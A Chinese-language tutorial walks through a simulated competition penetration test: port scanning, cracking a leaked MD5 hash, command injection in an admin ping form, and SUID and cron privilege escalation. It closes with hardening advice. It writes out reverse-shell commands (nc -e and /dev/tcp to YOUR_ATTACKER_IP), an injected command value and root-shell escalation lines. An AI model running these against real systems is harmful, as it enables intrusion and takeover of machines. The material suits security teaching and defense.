十年匠心定制 · 商业建站与技术教学双线并行 咨询热线:400-886-1026 service@lmnt.cn
ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

网络安全实战:从信息收集到权限提升的完整渗透测试演练

网络安全实战:从信息收集到权限提升的完整渗透测试演练 在实际的网络安全竞赛或渗透测试项目中经常会遇到一类场景目标系统看似简单但常规的扫描和攻击手法收效甚微需要结合多种技术进行深度信息收集和逻辑分析才能找到突破口。这类场景考验的是测试者的综合能力包括对常见服务、协议、配置漏洞的理解以及将零散信息串联成攻击路径的思维。本文将以一个模拟的竞赛环境代号“7.28 国赛1”为背景构建一个从零开始的实战演练。我们将不依赖任何现成的自动化利用工具而是通过手动探测、分析、推理和验证一步步揭示目标系统的脆弱点并最终获取关键权限。这个过程将涵盖Web应用、服务枚举、权限提升等多个层面适合有一定网络安全基础希望提升手动测试和逻辑分析能力的读者。1. 理解目标环境与信息收集策略在开始任何攻击之前充分的信息收集是成功的一半。对于“7.28 国赛1”这类未知目标我们需要建立一个系统化的侦察流程。1.1 初始目标定位与网络发现通常竞赛环境会提供一个IP地址或域名作为入口。假设我们获得的目标IP是192.168.1.100。第一步是确认其存活状态和开放的端口。# 使用ping进行基础连通性测试注意目标可能禁ping ping -c 4 192.168.1.100 # 使用nmap进行全面的端口扫描识别开放的服务 nmap -sS -sV -O -p- 192.168.1.100 -T4 -oA initial_scan关键参数解释-sS: TCP SYN扫描一种隐蔽且快速的扫描方式。-sV: 探测服务版本这对于识别特定版本的漏洞至关重要。-O: 尝试识别操作系统。-p-: 扫描所有65535个端口。-T4: 设置扫描速度为“激进”在可控网络环境下加快速度。-oA initial_scan: 将结果以所有格式normal, XML, grepable输出便于后续分析。扫描结果可能如下所示PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 80/tcp open http Apache httpd 2.4.41 3306/tcp open mysql MySQL 5.7.32 8080/tcp open http-proxy1.2 服务深度探测与指纹识别获得开放端口列表后需要对每个服务进行深度分析。HTTP/HTTPS服务 (80, 8080): 使用浏览器访问并利用工具如curl、whatweb、nikto、dirb/gobuster进行探测。# 获取网站基础信息 curl -I http://192.168.1.100 whatweb http://192.168.1.100 # 目录爆破寻找隐藏路径或文件 gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txtSSH服务 (22): 检查支持的认证方式和版本。尝试使用弱口令或默认口令如root/root, admin/admin进行爆破通常是第一步但更高级的利用可能涉及版本漏洞如CVE-2018-15473。# 尝试SSH版本识别和弱口令连接需谨慎易触发告警 ssh -o PreferredAuthenticationspassword -o PubkeyAuthenticationno root192.168.1.100MySQL服务 (3306): 尝试匿名或弱口令登录并枚举数据库信息。mysql -h 192.168.1.100 -u root -p # 如果允许匿名登录可能直接进入 mysql -h 192.168.1.1001.3 信息关联与攻击面梳理将收集到的所有信息整理成表格有助于发现关联点。服务端口服务类型版本信息初步发现潜在攻击向量22/tcpSSHOpenSSH 7.9p1可能存在用户名枚举漏洞弱口令爆破、版本漏洞利用80/tcpHTTPApache 2.4.41发现/admin、/backup目录目录遍历、文件上传、SQL注入3306/tcpMySQLMySQL 5.7.32允许root用户远程连接弱口令、SQL注入获取权限8080/tcpHTTP未知运行着一个Java应用如Tomcat默认后台、反序列化漏洞2. Web应用漏洞挖掘与利用假设在http://192.168.1.100:80的目录扫描中我们发现了/admin/login.php和一个疑似备份文件/backup/db_backup.sql。2.1 分析备份文件获取敏感信息下载并分析db_backup.sql文件。-- db_backup.sql 片段 CREATE TABLE users ( id int(11) NOT NULL AUTO_INCREMENT, username varchar(50) NOT NULL, password varchar(255) NOT NULL, -- 注意可能是MD5哈希 email varchar(100) DEFAULT NULL, role enum(user,admin) DEFAULT user, PRIMARY KEY (id) ); INSERT INTO users (id, username, password, email, role) VALUES (1, admin, 21232f297a57a5a743894a0e4a801fc3, admintarget.com, admin), (2, test_user, 098f6bcd4621d373cade4e832627b4f6, testtarget.com, user);关键发现获得了管理员用户名admin。获得了密码哈希值21232f297a57a5a743894a0e4a801fc3。通过在线MD5解密网站或本地彩虹表可以轻易破解此哈希得到明文密码admin。这是一个典型的安全失误——使用弱哈希且未加盐。2.2 利用凭证进行身份认证现在我们尝试使用admin/admin登录/admin/login.php。常见坑点1登录失败的可能原因密码已更改备份文件可能过时。会话或Token验证页面可能存在CSRF Token或额外的验证码。密码加密方式不同前端可能对密码进行了额外的编码如Base64再传输。检查与绕过使用浏览器开发者工具F12查看登录请求。如果发现除了username和password外还有csrf_token等字段需要先访问登录页获取该Token再构造完整的POST请求。# 使用curl模拟登录处理Cookie和可能的Token curl -c cookies.txt -b cookies.txt -X POST \ -d usernameadminpasswordadmincsrf_tokenYOUR_TOKEN_HERE \ http://192.168.1.100/admin/login.php \ -v如果登录成功响应头中通常会有Set-Cookie字段或者直接跳转到后台管理页面。2.3 后台功能点探测与漏洞利用成功进入后台后需要系统性地检查每一个功能点文件上传寻找任何可以上传图片、文档、附件的地方。尝试上传Webshell如一句话木马。数据查询/编辑寻找用户管理、内容管理等功能测试是否存在SQL注入。系统设置/配置文件查看可能泄露数据库连接信息、绝对路径等。命令执行寻找“Ping测试”、“系统信息”等功能测试命令注入。假设后台有一个“系统维护 - 执行Ping命令”的功能输入框提示“输入IP地址”。这极有可能存在命令注入漏洞。测试命令注入正常输入127.0.0.1尝试注入127.0.0.1; whoami如果成功尝试获取反向Shell# 在攻击机上监听 nc -lvnp 4444 # 在目标输入框注入假设目标有nc 127.0.0.1; nc -e /bin/bash YOUR_ATTACKER_IP 4444注意实际环境中目标系统可能没有netcat或bash。需要根据系统类型通过uname -a判断尝试其他命令如python、php、perl等来建立反向连接。3. 权限维持与横向移动通过Web漏洞获取的往往是Web服务进程如www-data、apache的权限权限较低。下一步是提权Privilege Escalation和横向移动Lateral Movement。3.1 信息收集在已获得的Shell中# 查看当前用户和权限 id whoami # 查看系统信息 uname -a cat /etc/os-release # 查看敏感文件SUID文件、可写目录、计划任务等 find / -perm -us -type f 2/dev/null find / -writable -type d 2/dev/null cat /etc/crontab # 查看网络连接和用户 netstat -antp cat /etc/passwd3.2 利用SUID文件提权如果发现某个具有SUID权限的可执行文件例如find、vim、bash、cp等并且属于root可以利用它来提权。示例利用find提权# 如果 find 有 SUID 位 ls -la /usr/bin/find # -rwsr-xr-x 1 root root ... /usr/bin/find # 利用 find 执行命令 /usr/bin/find . -exec /bin/sh -p \; -quit # 此时会获得一个root权限的shell3.3 利用计划任务Cron Job提权检查/etc/crontab或/var/spool/cron/目录看是否有以root权限运行的脚本且该脚本当前用户可写。cat /etc/crontab # 假设发现一行 # * * * * * root /opt/scripts/backup.sh ls -la /opt/scripts/backup.sh # 如果该文件对我们可写我们可以修改它加入反弹shell的命令 echo bash -i /dev/tcp/YOUR_ATTACKER_IP/5555 01 /opt/scripts/backup.sh然后在我们自己的攻击机上监听5555端口等待计划任务执行。3.4 横向移动至其他主机如果内网还有其他主机需要进一步探测。# 查看ARP缓存和路由 arp -a route -n # 使用简单的ICMP或TCP扫描内网其他主机从已控主机发起 for i in {1..254}; do ping -c 1 192.168.1.$i | grep bytes from done # 或者使用上传的nmap静态二进制文件进行扫描发现新主机后重复第1章和第2章的流程尝试利用相同的漏洞如弱口令或新的漏洞进行渗透。4. 常见问题排查与防御建议在实战演练中经常会遇到各种意外情况。以下是一些常见问题的排查思路。4.1 漏洞利用失败排查表问题现象可能原因检查方式处理建议端口扫描无结果目标防火墙拦截使用-Pn参数跳过主机发现nmap -Pn -p- 192.168.1.100Web目录爆破无收获字典不匹配尝试其他字典如big.txt,raft-large-*结合域名、项目名生成自定义字典SQL注入Payload无效存在WAF或过滤测试大小写、编码、注释符绕过使用sqlmap的--tamper脚本上传的Webshell无法访问文件被重命名、移动或解析失败检查返回的路径、文件权限、后缀名尝试双后缀shell.php.jpg、.htaccess解析攻击反向Shell连接不上出站防火墙限制、命令不存在、IP/端口错误在目标机测试telnet YOUR_IP 4444尝试其他端口如53, 443、其他方式如Python/PHP反向Shell提权EXP编译失败缺少依赖库、架构不匹配查看错误信息检查gcc和libc版本寻找静态编译的二进制EXP或交叉编译4.2 从防御角度反思“7.28 国赛1”中的安全失误作为开发或运维人员可以从攻击路径反推加固措施信息泄露失误将数据库备份文件.sql放在Web可访问目录。加固备份文件应存放在非Web根目录并通过严格的访问控制如IP白名单保护。禁止在版本库中提交包含密码的配置文件或SQL文件。弱密码与弱哈希失误使用未加盐的MD5存储密码且密码强度极低。加固使用强密码策略。密码存储必须使用加盐的、抗碰撞的哈希算法如bcrypt、scrypt或Argon2。命令注入失误后台功能未对用户输入进行过滤直接拼接进系统命令。加固永远不要将用户输入直接传递给系统Shell。如果必须执行命令使用白名单机制验证输入或使用参数化调用如subprocess.run([‘ping‘, ‘-c‘, ‘4‘, user_input])在Python中。不安全的服务配置失误MySQL允许root用户远程登录。加固数据库服务应只监听本地回环地址127.0.0.1。使用专用、低权限的用户进行应用连接。权限配置不当失误为普通工具如find、vim设置不必要的SUID位。加固定期审计系统SUID/SGID文件移除非核心程序的相关权限。遵循最小权限原则。4.3 渗透测试后的清理与报告在授权测试结束后应进行清理并出具报告。清理删除上传的Webshell、创建的临时用户、添加的计划任务、以及测试过程中产生的任何文件和数据。报告报告应清晰描述发现的漏洞、利用步骤、风险等级如高、中、低以及具体的修复建议。修复建议应尽可能具体、可操作。通过“7.28 国赛1”这样一个综合场景的演练我们可以清晰地看到一次成功的渗透测试是信息收集、漏洞利用、权限提升和横向移动等多个环节环环相扣的结果。真正的安全防御也需要在每个环节都部署相应的检测和防护措施而不仅仅是修补某一个具体的漏洞点。对于安全学习者而言手动重复这个过程远比依赖自动化工具更能深刻理解攻击链和防御的本质。
返回列表